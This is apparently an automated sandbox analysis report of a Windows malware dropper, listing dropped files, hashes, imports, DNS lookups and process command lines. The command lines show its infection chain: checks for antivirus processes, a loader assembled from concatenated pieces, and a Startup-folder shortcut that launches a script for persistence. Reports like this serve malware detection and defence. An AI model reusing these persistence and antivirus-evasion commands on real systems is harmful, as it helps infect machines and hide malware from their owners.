                                        SHA-512:C485EA7AE809C2F53BFDE939E98DFCE612638A509AD26D2F0B35DF9886AA338942F7D49EAA5B00C0C5260FD425D3B222AEE2695024E04927C0F55798C7A17EED
                                        Malicious:true
                                        Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TradeOptimize Dynamics\\TradeHub.scr\" \"C:\\Users\\user\\AppData\\Local\\TradeOptimize Dynamics\\z\"")

                                        C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):893608
                                        Entropy (8bit):6.62028134425878
                                        Encrypted:false
                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        • Antivirus: Virustotal, Detection: 11%, Browse
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\TradeOptimize Dynamics\z

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        File Type:SysEx File - Harmony
                                        Category:dropped
                                        Size (bytes):527122
                                        Entropy (8bit):7.99963712608285
                                        Encrypted:true
                                        SSDEEP:12288:rjHgoZqjIFzXqCQx0xCJXUpjMFMxvrbNotLgiV5aLleFz7:jimXKgBMFYvu9mLUFz7
                                        MD5:50B908B6812EC7A27452EFE98E5E659F
                                        SHA1:B33663A2FECA423DC0ADD80050D9678044FD52D2
                                        SHA-256:9A2791A019D3171D07703C70ACEBB39E816B3D57CE49E6C02FE9210A9DF7D601
                                        SHA-512:A13F1CC17B08CF1E7F447ADB3C6D8E103C932B854E560A768ABCA5E832912D1AC29685D04E22B616136DC0A81CF457B99ED1006081A856F3120D0AFEF2C5C8F1
                                        Malicious:false
                                        Preview:..7.v..Z..%+...=......g...Mi.0w..K&.?..8..V..{.?......_.@..q.)...........Hi....u..J......C|..+b.`./.Xxq.T...U0..H..KM..........x.y...l..Q.Z..b..-..zCm...Di.x.c.%.Y.g..*.?.?.7.R...(.=.>...>QF..15x.>..7.P.-.D.e%....:...G....=5....\.=).).~.#T.j.:).6.{.0#j%'sx..U6....._...i....r......-,.....4....).P6I!T.n'|,w:...lD...x...[QZ.l.)..."h.90....Z...[.....K."<........x..q.....s.Q..B.|.,#...nF..6..J...Qn....w.....5......a.p*..XK.)..?...>..O..u..t..k....dh.......@......C3..K..Q..i..Onc..7..b..5u...fz<.......;4..t...........;....].D,.%pU..A.P.d R.....0../..8..Fw.H.[6)..U.J....V....;@x+@.|r..u..............N.@..K. ......].....y...WI.[.A.t-.IJu..x.,..e.....C.[./.Q.J..... ..[...B.$M..I.zh........$.8.40..D..u.[..6.M..2.7.d.m6..A^......9.....].........i.m. ....z..?.<E....&+.h..jCr.tT...P.M.f.2G.bf.Vv.G.q=...:..3......".T.u..AW!..........b.}A..+21-..h..".........*>..J.%...E..W...*.0...h.;.ceE.-'........vM..z.".G..F..NyaC6...b.r.G...:YX..@x.RIJe..<.WC....(..;.

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):95
                                        Entropy (8bit):4.990600019916754
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5xXnfgRIvAkLPgFy:HRYF5yjowkn23RnYuYkUy
                                        MD5:6CCE1D322BB1682B00B64E2328D7B120
                                        SHA1:8EE5C24BCDF55245950017EA512BBC1FCD032625
                                        SHA-256:D27F9E410363A0C570023314CFE2DA6E53999CDA22AB48F0966C06EBA66C6A57
                                        SHA-512:21C53F8B6BD50D02F445A1470F84F291AC5F2F3F28E8C20370B0D438CCCA43789BEFC76B6D84459FA047C8F4F99BCA356C745F0C3AAF625316D98315C3436A8B
                                        Malicious:true
                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" ..

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.904754636262584
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:1'048'576 bytes
                                        MD5:db7b43084f7a44e3290774e36d49ce41
                                        SHA1:1e1321a6e0c6f63b719daccdacbde4a10547021e
                                        SHA256:a6da6ca04ee56f1e10dc25c07f938300fff7b3c1b50abe925b5f2b10b084216b
                                        SHA512:4aed7c811149bef41a2cf6383ca2ed6ce8cd4d5de72d23c75c6a5a8c69afea4af9a894b088a344571e3b93d743786d488ef6fb0e8efb530991e1f7ce3d212ecb
                                        SSDEEP:24576:0R6fmjDVJkCBEbXRNdyfxFAUrQO8+m3McolTzUJ+cv:Qjk9bhNdcUD+m3MzTC+Y
                                        TLSH:302523D3A4F98146F5313EF137A551300A6EBC3E8D1895461B45BBBA36338CA8638B77
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                        File Icon

                                        Icon Hash:baaafaf8e4a69ab6

                                        Static PE Info

                                        General

                                        Entrypoint:0x403883
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:be41bf7b8cc010b614bd36bbca606973

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 000002D4h
                                        push ebx
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        xor ebp, ebp
                                        pop esi
                                        mov dword ptr [esp+18h], ebp
                                        mov dword ptr [esp+10h], 00409268h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [00408030h]
                                        push 00008001h
                                        call dword ptr [004080B4h]
                                        push ebp
                                        call dword ptr [004082C0h]
                                        push 00000008h
                                        mov dword ptr [00472EB8h], eax
                                        call 00007F9788D9A19Bh
                                        push ebp
                                        push 000002B4h
                                        mov dword ptr [00472DD0h], eax
                                        lea eax, dword ptr [esp+38h]
                                        push eax
                                        push ebp
                                        push 00409264h
                                        call dword ptr [00408184h]
                                        push 0040924Ch
                                        push 0046ADC0h
                                        call 00007F9788D99E7Dh
                                        call dword ptr [004080B0h]
                                        push eax
                                        mov edi, 004C30A0h
                                        push edi
                                        call 00007F9788D99E6Bh
                                        push ebp
                                        call dword ptr [00408134h]
                                        cmp word ptr [004C30A0h], 0022h
                                        mov dword ptr [00472DD8h], eax
                                        mov eax, edi
                                        jne 00007F9788D9776Ah
                                        push 00000022h
                                        pop esi
                                        mov eax, 004C30A2h
                                        push esi
                                        push eax
                                        call 00007F9788D99B41h
                                        push eax
                                        call dword ptr [00408260h]
                                        mov esi, eax
                                        mov dword ptr [esp+1Ch], esi
                                        jmp 00007F9788D977F3h
                                        push 00000020h
                                        pop ebx
                                        cmp ax, bx
                                        jne 00007F9788D9776Ah
                                        add esi, 02h
                                        cmp word ptr [esi], bx

                                        Rich Headers

                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ C ] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xf6a0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xf40000xf6a00xf800371b69fb39c50291af33e52b15bbd4bdFalse0.46233933971774194data5.945826329561015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1040000xf320x100087c9e2d71f37c12833b915bfb48a871bFalse0.546875data5.625060303810123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xf41c00x9928Device independent bitmap graphic, 96 x 192 x 32, image size 39168EnglishUnited States0.4530197918792083
                                        RT_ICON0xfdae80x5638Device independent bitmap graphic, 72 x 144 x 32, image size 22032EnglishUnited States0.5055726712577021
                                        RT_DIALOG0x1031200x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0x1032200x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x1033400x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x1033a00x22dataEnglishUnited States0.9705882352941176
                                        RT_MANIFEST0x1033c80x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                        Imports

                                        DLLImport
                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 2, 2024 02:30:33.502398968 CEST4986653192.168.2.41.1.1.1
                                        Oct 2, 2024 02:30:33.516901970 CEST53498661.1.1.1192.168.2.4
                                        Oct 2, 2024 02:30:46.275460005 CEST5156153192.168.2.41.1.1.1
                                        Oct 2, 2024 02:30:46.283523083 CEST53515611.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 2, 2024 02:30:33.502398968 CEST192.168.2.41.1.1.10x653aStandard query (0)bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPHA (IP address)IN (0x0001)false
                                        Oct 2, 2024 02:30:46.275460005 CEST192.168.2.41.1.1.10x3734Standard query (0)bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPHA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 2, 2024 02:30:33.516901970 CEST1.1.1.1192.168.2.40x653aName error (3)bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPHnonenoneA (IP address)IN (0x0001)false
                                        Oct 2, 2024 02:30:46.283523083 CEST1.1.1.1192.168.2.40x3734Name error (3)bsQfWYzSEObgoEYPHvZYAafhPH.bsQfWYzSEObgoEYPHvZYAafhPHnonenoneA (IP address)IN (0x0001)false

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:20:30:28
                                        Start date:01/10/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x400000
                                        File size:1'048'576 bytes
                                        MD5 hash:DB7B43084F7A44E3290774E36D49CE41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:20:30:29
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:20:30:29
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xbb0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "wrsa opssvc"
                                        Imagebase:0xd0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xbb0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                        Imagebase:0x7ff7699e0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c md 182349
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /V "RefundAlienConservativeChapters" Coral
                                        Imagebase:0xd0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        Wow64 process (32bit):true
                                        Commandline:Beginners.pif l
                                        Imagebase:0xb0000
                                        File size:893'608 bytes
                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 5%, ReversingLabs
                                        • Detection: 11%, Virustotal, Browse
                                        Reputation:moderate
                                        Has exited:false

                                        General

                                        Target ID:11
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\choice.exe
                                        Wow64 process (32bit):true
                                        Commandline:choice /d y /t 5
                                        Imagebase:0x5d0000
                                        File size:28'160 bytes
                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:20:30:32
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:20:30:32
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:20:30:42
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js"
                                        Imagebase:0x7ff78c480000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:20:30:42
                                        Start date:01/10/2024
                                        Path:C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"
                                        Imagebase:0xd60000
                                        File size:893'608 bytes
                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 5%, ReversingLabs
                                        • Detection: 11%, Virustotal, Browse
                                        Has exited:false

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:17.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:20.7%
                                          Total number of Nodes:1526
                                          Total number of Limit Nodes:33
                                          execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 